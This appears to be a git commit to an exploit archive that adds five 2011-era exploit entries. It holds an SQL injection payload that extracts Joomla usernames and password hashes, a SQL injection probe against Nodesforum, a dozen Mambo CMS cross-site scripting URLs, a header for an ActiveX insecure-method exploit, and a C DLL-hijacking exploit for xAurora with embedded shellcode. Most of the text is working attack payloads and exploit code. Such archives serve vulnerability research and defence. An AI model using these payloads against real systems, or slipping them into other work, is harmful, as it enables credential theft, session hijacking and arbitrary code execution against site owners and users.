From 4b322b34f06ea66dd776dd586ab8f6c3c96d85ea Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 26 Jan 2015 08:36:28 +0000 Subject: [PATCH] Update: 2015-01-26 5 new exploits --- files.csv | 5 ++++ platforms/php/webapps/35882.txt | 7 +++++ platforms/php/webapps/35883.txt | 7 +++++ platforms/php/webapps/35884.txt | 31 +++++++++++++++++++++ platforms/windows/remote/35880.html | 19 +++++++++++++ platforms/windows/remote/35881.c | 43 +++++++++++++++++++++++++++++ 6 files changed, 112 insertions(+) create mode 100755 platforms/php/webapps/35882.txt create mode 100755 platforms/php/webapps/35883.txt create mode 100755 platforms/php/webapps/35884.txt create mode 100755 platforms/windows/remote/35880.html create mode 100755 platforms/windows/remote/35881.c diff --git a/files.csv b/files.csv index f1a102b36..091dd870b 100755 --- a/files.csv +++ b/files.csv @@ -32322,3 +32322,8 @@ id,file,description,date,author,platform,type,port 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0 +35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0 +35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0 +35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0 +35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0 +35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 diff --git a/platforms/php/webapps/35882.txt b/platforms/php/webapps/35882.txt new file mode 100755 index 000000000..964f5d8b3 --- /dev/null +++ b/platforms/php/webapps/35882.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/48451/info + +Nodesforum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/?_nodesforum_node=u1' \ No newline at end of file diff --git a/platforms/php/webapps/35883.txt b/platforms/php/webapps/35883.txt new file mode 100755 index 000000000..ff73d6f2f --- /dev/null +++ b/platforms/php/webapps/35883.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/48452/info + +The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+ \ No newline at end of file diff --git a/platforms/php/webapps/35884.txt b/platforms/php/webapps/35884.txt new file mode 100755 index 000000000..edf45ff9c --- /dev/null +++ b/platforms/php/webapps/35884.txt @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/48455/info + +Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Mambo CMS 4.6.5 is vulnerable; other versions may also be affected; + +http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32 + +http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20 + +http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS + +http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS + +http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC">&filter_authorid=62&hidemainmenu=0&option=com_typedcontent + +http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss">&task=&limitstart=0&hidemainmenu=0&option=com_comment + +http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27 + +http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 + +http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 + +http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 + +http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis + +http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 \ No newline at end of file diff --git a/platforms/windows/remote/35880.html b/platforms/windows/remote/35880.html new file mode 100755 index 000000000..73e268e94 --- /dev/null +++ b/platforms/windows/remote/35880.html @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/48408/info + +LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method. + +Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/35881.c b/platforms/windows/remote/35881.c new file mode 100755 index 000000000..38d6c78d7 --- /dev/null +++ b/platforms/windows/remote/35881.c @@ -0,0 +1,43 @@ +source: http://www.securityfocus.com/bid/48432/info + +xAurora is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +*/ + +#include +#include +#include + + +char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" +"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" +"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" +"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" +"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" +"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00" +"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56" +"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" +"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63" +"\x2e\x65\x78\x65\x00"; + +int xAuroraPwnage() +{ +int *ret; +ret=(int *)&ret+2; +(*ret)=(int)shellcode; +MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK); +return 0; + +} +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) +{ + xAuroraPwnage(); + return 0; +} +